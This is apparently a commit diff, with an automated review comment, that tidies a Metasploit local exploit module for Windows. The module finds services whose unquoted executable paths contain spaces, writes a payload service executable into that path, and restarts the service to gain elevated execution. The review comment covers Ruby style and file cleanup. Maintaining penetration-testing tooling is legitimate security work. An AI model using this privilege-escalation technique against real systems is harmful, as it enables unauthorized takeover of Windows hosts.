Tidyup trusted_service_path
Use filedropper, use service exe, dont migratebug/bundler_fix
parent
484bf2f8fc
commit
101e5a8ccf
@ -9,6 +9,7 @@ require 'msf/core/exploit/exe'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Post::Windows::Services
@ -44,10 +45,8 @@ class Metasploit3 < Msf::Exploit::Local
],
'Platform' => [ 'win'],
'Targets' => [ ['Windows', {}] ],
'SessionTypes' => [ "shell", "meterpreter" ],
'SessionTypes' => [ "meterpreter" ],
'DefaultTarget' => 0,
# Migrate away, in case the service dies (can kill access)
'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }
))
end
@ -77,8 +76,8 @@ class Metasploit3 < Msf::Exploit::Local
next if cmd !~ /^[a-z]\:.+\.exe$/i
next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)
vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})")
vuln_services << [name, cmd]
vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
vuln_services << [service[:name], cmd]
# This process can be pretty damn slow.
# Allow the user to just find one, and get the hell out.
@ -95,63 +94,32 @@ class Metasploit3 < Msf::Exploit::Local
#
print_status("Finding a vulnerable service...")
svrs = enum_vuln_services(true)
if svrs.empty?
print_error("No service found with trusted path issues")
return
end
fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty?
svr_name = svrs.first[0]
fpath = svrs.first[1]
exe_path = "#{fpath.split(' ')[0]}.exe"
print_status("Placing #{exe_path} as #{svr_name}")
print_status("Placing #{exe_path} for #{svr_name}")
#
# Drop the malicious executable into the path
#
exe = generate_payload_exe
exe = generate_payload_exe_service({:servicename=>svr_name})
print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
begin
write_file(exe_path, exe)
register_files_for_cleanup(exe_path)
rescue Rex::Post::Meterpreter::RequestError => e
# Can't write the file, can't go on
print_error(e.message)
return
fail_with(Failure::Unknown, e.message)
end
#
# Run the service, let the Windows API do the rest
#
print_status("Launching service #{svr_name}...")
tried = false
begin
status = service_start(svr_name)
raise RuntimeError, status if status != Error::SUCCESS
rescue RuntimeError => s
if tried
print_error("Unable to start #{svr_name}")
return
else
tried = true
end
case s.message.to_i
when Error::SERVICE_ALREADY_RUNNING
service_stop(svr_name)
retry
when Error::SERVICE_DISABLED
service_change_startup(svr_name, 'manual')
retry
end
end
#
# "Nothing ever happened, we swears it on the Precious!"
#
print_status("Deleting #{exe_path}")
file_rm(exe_path)
service_restart(svr_name)
end
end
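Review bot: In the last hunk, `exe = generate_payload_exe_service({:servicename=>svr_name})` wraps a single trailing option in explicit braces with hash-rocket syntax; the idiomatic call is `exe = generate_payload_exe_service(servicename: svr_name)`, assuming the project's minimum Ruby accepts that syntax. In the `rescue Rex::Post::Meterpreter::RequestError => e` branch, if `print_error(e.message)` stays on the new side next to the added `fail_with(Failure::Unknown, e.message)` — the rendering does not show which side that line is on — the same message is reported twice, since fail_with already surfaces it, so the print_error line can be dropped. Because the explicit `file_rm(exe_path)` / `service_restart(svr_name)` sequence is removed and cleanup now rests on the registration at `register_files_for_cleanup(exe_path)`, a one-line comment there such as `# exe_path is removed by FileDropper at cleanup, not inline` would make that intent visible to the next maintainer. The exploit method enclosing this hunk begins before the hunk header.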